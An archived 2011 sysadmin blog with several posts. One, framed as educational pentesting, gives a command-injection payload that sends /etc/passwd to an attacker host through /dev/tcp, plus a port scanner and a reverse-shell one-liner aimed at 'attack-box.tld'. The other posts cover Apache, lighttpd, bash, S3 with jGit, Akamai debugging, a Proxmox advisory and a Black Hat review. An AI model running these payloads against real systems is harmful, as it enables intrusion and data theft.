Alexandre De Dommelin weblog

Apache : Inject HTTP response header in a rewrited URL using environment variable

Alexandre De Dommelin — 2011-11-22T20:11:31+00:00

I've spent a few hours looking for a way to inject HTTP response headers in a rewrited URL directly from the Apache configuration.

Here's the trick, in the RewriteRule just set a environment variable, ie: "addheader".
But unfortunately, this one can't be used as-is as a condition in the "Header" directive. In this case you'll need to rely on the presence / absence of the "REDIRECT_addheader" :

RewriteEngine On
RewriteRule ^([A-Z]{2})_([a-z]{2})$  /rewrite.php?a=$1&b=$2 [L,E=addheader:1]
Header set my-header "myvalue" env=REDIRECT_addheader

Puppet Talk @ Journées du Logiciel Libre 2011

Alexandre De Dommelin — 2011-11-19T10:31:32+00:00

Here are the slides of the talk I've given at Journées du Logiciel Libre yesterday in Lyon (Download)

Présentation Puppet Journées du Logiciel Libre 2011

View more presentations from Alexandre De Dommelin.

Parse .ini files with bash and sed

Alexandre De Dommelin — 2011-10-19T18:41:31+00:00

Here's a very cool way to parse ini files inside a shell script.
The following snippet will declare variables in the current scope of your script from all the key/values pairs present in the matching section.

#!/bin/bash
CONFIG_FILE="config.ini"
SECTION="section_1"

eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \
    -e 's/;.*$//' \
    -e 's/[[:space:]]*$//' \
    -e 's/^[[:space:]]*//' \
    -e "s/^\(.*\)=\([^\"']*\)$/\1=\"\2\"/" \
   < $CONFIG_FILE \
    | sed -n -e "/^\[$SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"`

Using Amazon S3 to store private Git repositories

Alexandre De Dommelin — 2011-08-01T16:03:57+00:00

Here's a solution to use Amazon S3 to store private Git repositories using jGit.
First, you need to install Java Runtinme, Git (openjdk-6-jre and git packages in Debian) and download jGit :

sudo wget -O /usr/local/bin/jgit "http://download.eclipse.org/jgit/maven/org/eclipse/jgit/org.eclipse.jgit.pgm/1.0.0.201106090707-r/org.eclipse.jgit.pgm-1.0.0.201106090707-r.sh"
sudo chmod +x /usr/local/bin/jgit

Create Access Keys in your Amazon Web Services Console and add them to your ~/.jgit file :

echo "accesskey: your_access_key" > ~/.jgit
echo "privatekey: your_private_key" >> ~/.jgit
chmod 600 ~/.jgit

You also need to create a S3 bucket, let's call it "my_git".

Initializing repo & pushing to S3

cd ~/hack/project_name/
git init
git remote add s3 amazon-s3://.jgit@my_git/project-name.git
git add *
git commit -m "Initial Commit" -a
jgit push s3 master

Cloning repository from S3

cd ~/tmp/
jgit clone amazon-s3://.jgit@my_git/project-name.git

Updating
jGit doesn't support merge or pull so do it in 2 steps :

cd ~/tmp/project-name/
jgit fetch
git merge origin/master

As you can see, jGit is only used when interacting with S3, standard git commands are still used otherwise.

Troubleshooting Akamai delivery - Getting Headers using curl

Alexandre De Dommelin — 2011-07-24T23:41:52+00:00

I'm playing with Akamai everyday and regularly have to analyze / debug objects delivery.
Here's a way of getting useful informations about how Akamai is handling requests & objects delivery using curl :

$ curl -I -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no"

By aliasing this command in your shell, usage is simple (ie the homepage Facebook logo) :

$ akcurl http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
HTTP/1.1 200 OK
Content-Length: 2209
Content-Type: image/png
Last-Modified: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: 
Cache-Control: public, max-age=17729726
Expires: Wed, 15 Feb 2012 02:30:08 GMT
Date: Sun, 24 Jul 2011 21:34:42 GMT
X-Cache: TCP_MEM_HIT from a212-243-221-243 (AkamaiGHost/6.5.0.2-8185567) (-)
X-Cache-Key: /L/749/27754/28d/static.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
X-True-Cache-Key: /L/static.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
X-Akamai-Session-Info: name=PARENT_SETTING; value=TD
X-Serial: 749
Connection: keep-alive
X-Check-Cacheable: YES

12th Annual System Administrator Appreciation Day

Alexandre De Dommelin — 2011-07-16T16:59:14+00:00

Friday, July 29, 2011, is the 12th annual System Administrator Appreciation Day. On this special international day, give your System Administrator something that shows that you truly appreciate their hard work and dedication. (All day Friday, 24 hours, your own local time-zone).

In case, I've updated my thinkgeek wishlist :-)

Remote Command Injection - Playing with /dev/tcp

Alexandre De Dommelin — 2011-05-23T22:01:03+00:00

Important note : this article is for educational purpose only ...
When pentesting web applications, you can sometimes found remote command injection vulnerabilities. These vulnerabilities exist when user input is not properly sanitized and used, inside, for example, PHP functions such as exec(), system() ... here's a stupid example of vulnerable code :

In this case, you can see that $_GET['dir'] is injectable, but no output will be returned to user. Considering that you can't create any file into the DocumentRoot of the vulnerable site, and that you can't upload your own binary (netcat for example), here's a good way to exploit /dev/tcp capabilities to send everything you want to another server and much more.

What is /dev/tcp ?
/dev/tcp is a Bash built-in which can be used to create a TCP socket on which you can interact using regular IO redirections. Usage / Exploitation
Put netcat in listen mode on a remote box "attack-box.tld" on a given port (4444 here)

$ nc -klvp 4444
listening on [any] 4444 ...

Then, send a crafted request on the vulnerable file :

% curl -I 'http://www.victim.tld/create_dir.php?dir=%2f%3B%20bash%20-c%20%22cat%20%2fetc%2fpasswd%3E/dev/tcp/attack-box.tld/4444"'
HTTP/1.1 200 OK
Content-type: text/html
Date: Mon, 23 May 2011 19:45:08 GMT
Server: Apache

You can immediately see on "attack-box" the following output, the victim's /etc/passwd file :

$ nc -klvp 4444
listening on [any] 4444 ...
connect to [xxx.xxx.xxx.xxx] from www.victim.tld [yyy.yyy.yyy.yyy] 37216
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
postfix:x:101:105::/var/spool/postfix:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
[...]

More fun ...
You can also use /dev/tcp properties to create a basic port-scanner, which can send to your box the results :

port=1;
ip=192.168.142.12;
while [ $port -lt 1024 ];
do
  echo > /dev/tcp/$ip/$port;
  [ $? == 0 ] && echo "Found ${ip}:${port} opened" >> /tmp/ports;
  port=`expr $port + 1`;
done;
cat /tmp/ports > /dev/tcp/attack-box.tld/4444;

Or also use it to bring up a quick reverse-shell :

$ bash -i >& /dev/tcp/attack-box.tld/4444 0>&1

Of course, for those 2 examples, you need a nc listening on "attack-box.tld" ...

Optimizing website performance using lighttpd mod_compress and /dev/shm

Alexandre De Dommelin — 2011-04-09T15:31:10+00:00

Lighttpd allows output compression for static files using gzip (RFC1952), deflate (RFC1950, RFC1951) and bzip2 through mod_compress. As major HTTP clients now supports content compression, and announce it to webservers using the "Accept-Encoding" HTTP header, compressing content before sending it is a good way to reduce network load and improve the overall throughput of the webserver.

Lighttpd needs a cache folder to store compressed data, so in order to improve performance, we will use /dev/shm as storage point. /dev/shm appears as a mounted fs but instead of using a physical partition, he relies on virtual memory. Here is the relevant part of the config (/etc/lighttpd/lighttpd.conf):

server.modules              = (
        [...]
        "mod_compress",
        [...]
)

compress.allowed-encodings = ("gzip", "deflate")
compress.cache-dir          = "/dev/shm/lightty_compress/"
compress.filetype           = ("text/plain","text/css","text/xml","text/javascript","text/html","application/javascript")

The cache folder will be automatically created on lightty startup. This setup is quite basic (compression of CSS, JS & HTML files), but covers my needs (no dynamic language such as PHP). Let's see the difference with and without output compression :

Without output compression

With output compression

No more comments needed :-)

[Security Advisory] Multiple vulnerabilities in PVE Manager

Alexandre De Dommelin — 2011-03-31T19:01:03+00:00

I want to warn you about multiple vulnerabilities (Cross-Site Scripting & Cross-Site Request Forgery) I've found into Proxmox Virtual Environment Manager. Proxmox is an Open Source virtualization platform for running Virtual Appliances and Virtual Machines (OpenVZ & KVM).

These vulnerabilities can be exploited by an attacker to trigger actions (CT shutdown, removal ...) on targetted PVE Manager.

Product affected	Proxmox Virtual Environment Manager
Versions affected	<= 1.7
Details	Persistant XSS in CT "Note" Field (WASC-08) Multiple CSRF in various forms, can lead to force CT shutdown ... (WASC-09)
Disclosure Timeline	2011-03-16 : Identified vulnerabilities 2011-03-21 : Informed vendor (Dietmar Maurer @ promox com ) 2011-03-22 : Provided additional informations to vendor 2011-03-25 : Patch applied by vendor 2011-03-30 : New Proxmox Release 2011-03-31 : Disclosed at my site
Mitigation	Upgrade to the latest version (1.8-15)

Blackhat Europe 2011 - Briefings review

Alexandre De Dommelin — 2011-03-21T20:43:00+00:00

Just coming back from my week at Barcelona, Spain where I came to attend Blackhat Europe Briefings & Trainings.
It was my first BH, and I must admit that it was what I expected : fun, very interesting and instructive.

Many tracks sounds very interesting (see schedule), it was quite hard to make a choice, but I end up with the following :

[core attacks] New Age Attacks Against Apple's iOS (and Countermeasures)
Speaker : Nitesh Danjani
This talks started with two numbers : 100 million iPhones & 15 million iPads sold. These impressive results are mainly due to well-designed hardware and very intuitive software. The reality now is that with 15 billion apps downloaded, more and more users are storing personal data, and that, in corporate environments, they are becoming to store confidential informations (email ...).
iOS uses URLSchemes (protocol handlers) to link requests between applications which is quite common, however, except for "tel:/", no confirmation is prompted, so it's quite easy to make iOS-based devices to start applications remotely for example using an iframe in a web page :

In this case, the user will be connected to Justin Bieber without any confirmation :-)
This example is not (?) harmless, but the author said that a lot of URLSchemes are undocumented because they were added for testing purposes ... but still available on prod. Nitesh made a demo about the "skype://" handler forces the user to place a Skype Call. This "payload" is included into BeEF, so a simple XSS vulnerability is enough.
This is only one of the issue of which developers should care :

UI Spoofing inserting a fake URL bar
Identity deCloaking with a rogue AP / MiTM attack calling "fb://" profile
Bad SSL implementations
Push notification abuse

[app dissection] HTTP Parameter Pollution Vulnerabilities
Speaker : Marco Balduzzi
Web has evolved from static pages to complex applications, and 60% of the attacks are now web-apps targeted. Everybody knows about injections flaws such as SQL Injections, XSS, CSRF and many tools are available to detect and/or mitigate them. HTTP Parameter Pollution (HPP) is still less known (first presentation was made in 2009).
HTTP allows parameters to provided multiple times, and depending of the server-side language the parameter precedence is handled differently, so inserting "%26param%3Dvalue" into one of the variable can lead to overriding existing (harcoded) values.
HPP can also to be used for Cross-Channel pollution, when parameters can be provided from multiple sources (POST, GET, Cookie...). He also gave an example of CSRF token bypass on Yahoo! Mail, and, remember that if parameters are concatenated, it can be very useful to bypass WAF protections ...
Marco developed an online tool (python + firefox extension) to analyse websites for HPP vlunerabilities called PAPAS.
Popular websites were analysed (5016 websites in 15 days more than 149 000 unique pages) and found that 30% of them were vulnerable (not necessaraly exploitable). 14% (702) were found as exploitable where injected parameter override existing parameter or accepted as a new one.
Examples : the main Google site could be manipulated to produce search results different from the intended results, WHO main website to display different content, Facebook share button, AETV online shop to force people buying another product instead of the one they choose.

[app dissection] Web applications security payloads
Speaker : Andres Riancho
This talk was about w3af. w3af stands for Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. This project is OpenSource (GPLv2), is easily extensible using plugins, and, since 07/2010 have full-time development resources due to Rapid7 sponsoring.
2 interfaces are available, CLI & GUI.
Post exploitation in web applications flaws requires to change our mindset, because we are generally restricted to one or few functions (readfile() ...), that's where w3af comes in. The author developped plugins to exploit the read permission to achieve and automate actions on a vulnerable system :

Extract users list
Show established TCP connections
Try to extract sensitive files (bruteforcing paths / filenames)
Extract config files (apache, php, htaccess ...)
Download the source code of the remote web application

The last one is becoming very powerful because of another plugin : php_sca a static code analyzer which allows to automatically parse dumped source code to find other vulnerabilities such as SQL Injections & OS commanding. It's still in early stage but the demo was very impressive and get applause from the conference room.

[app dissection] SAP : Session (fixation) Attacks & Protections
Speaker : Raul Siles
HTTP is a stateless protocol, so session management have to be implemented into by developers themselves.
Session Fixation is different from Session Hijacking : in this case the attacker don't have to steal session ID from the victim, but will fix HIS session ID into the victim to get its privileges. The attacker sets up a session with a website, but does not log on. He then tricks a user into log in using the same session ID. As the session gets elevated, both the attacker and victim get the authenticated state.
The speaker remembers that social engeneering is not the only way to fix session ID on the victim (XSS, SQLi, MiTM ... are also a good way).
Working examples were demonstrated (flaws discovered by the speaker) :

Joomla Session Fixation in v1.5 - 1.5.15
Weblogic, based on a configuration problem (reported live during the talk)
SAP, using a MiTM attack where users where authenticated with NTLM on HTTP before getting redirected to the HTTPS application (real-case study)

To conclude : Session ID MUST be renewed every time the privileges level changes.

[keynote] Cyberwar
Speaker : Bruce Schneier
We have the honor to listen Bruce Schneier talking about Cyberwar, better than a long speach, you can download the keynote here.

[workshop] A taste of the latest Samurai Web Testing Framework
Speaker : Justin Searle
This workshop was directed by Justin Searle one of the founder of Samurai WTF.
This live CD, based on Ubuntu is a pentest distribution similar to BackTrack but targeted to web applications. Usage of many tools were shown, was interesting but didn't learned a much. However, I've found a good project to contribute :-).

[infrastructure rationale] Building Floodgates: Cutting-Edge Denial of Service Mitigation
Speakers : Yuri Gushin / Alex Behar
The 2 speakers are researchers in DoS mitigation techniques.
DoS attacks are becoming prevalent these times, and most of big attacks succeded (Wikileaks, Mastercard ...).
Different types of DoS presented :

Layer 3 : Flood of TCP, UDP, ICMP, IGMP packets overloading infrastructure
Layer 4 : Consuming CPU cycles ... on the device, eg. SYN flood, connections flood ...
Layer 7 : "Culmination of evil", attacking applications by trying to consume resources (HTTP page flood, HTTP bandwith consumption, HTTP POST DoS ...)

DoS mitigation techniques :

Static thresholds : setting a max rate, requires regular manual tuning
Adaptive threshold : attempting the learn real traffic characteristics, which improves accuracy, however, natural traffic peaks may be blocked too.

More sophisticated detection can be based on using 2-dimensions, for example DNS requests v.s. HTTP requests.
Some active mitigation techniques were shown :

Challenge response : This wards of clients that don't have a full protocol stack (SYN cookies or requiring JS, Flash ...)
Session Disruption : Causing the clients to use more resources in the attack that you need to mitigate the attack.
Tarpitting : Stalling malicious connections.

Then they presented their new tool : Roboo - HTTP Robot Mitigator (available @ www.ecl-labs.org).
This is a nginx module written in Perl based on a Challenge/Response mechanism, released under an OpenSource licence.
It responds to GET/POST requests from unverified source with a challenge. This challenge is JS or Flash based (optionnaly gzip'ed), to which only a real browser with full HTTP, HTML, JS and/or Flash stack can answer. Then a cookie is set and the traffic is marked as verified.

A demo was made attacking a protected website (the attack was made using LOIC - Low Orbit Ion Canon, the tool used to attack Wikileaks), and comparing the pcap with a "real request" made by a browser ... seems to work well.
The module allows you to provide IP ranges whitelist (in order let, for example, Google Bots indexing your website).

[infrastructure rationale] You are Doing it Wrong: Failures in Virtualization Systems
Speaker : Claudio Criscione
Virtualization aims to save money, make things simple and quick to deploy. Saving money and quick deployment are enemies of security :-)
Securing the hypervisor is, of course, very important, you must not be able to jump from one VM to another, but securing the management interface is very important too ! And it seems that this part is quite forgotten by vendors. The speaker announce that in 5 man days, he founds 18 "0-days".
Even simple bugs like XSS are problematic in virtualisation management interface, he made a demo of one in VMWare vCenter which took 1.5 year to patch ! He also with that introduced VASTO a metasploit module which allow to exploit various flaws in virtualization management interface.
The next demo was done against VMWare vSphere client using VASTO ... the client maintains a debug logfile containing SOAP Session ID worlwide readable, so you just have to read this file, extract the ID and start the expoit from metasploit to get administrative privileges on the virtualization infrastructure without beeing prompted for any password.

He then introduced VASTOKeeper, a PoC based on apache/mod_security to define which communication is allowed between the management solution and the virtual machines where you can define which actions a user can execute on a virtual infrastructure regardless of his or her authentication level.
It will generate a network configuration file and a mod_security configuration file that will prevent certain actions for propagating from vCenter to ESXi.

[infrastructure rationale] Monoculture - the other side
Speaker : Damir Rajnovic
This talk was made by Gaus from the Cisco PSIRT, which tried to demonstrate that buying equipement from different vendors can't conduct to improve security.
He shows examples I didn't approved like that there are a lot of similar flaws in GNU/Debian Linux & Red Hat so that we can conclude that those 2 projects are quite linked and so suggested that using different distributions wouldn't help, and that buying from different vendors should lead to the same result.

See you next year !

Some photos (Blackhat & BCN)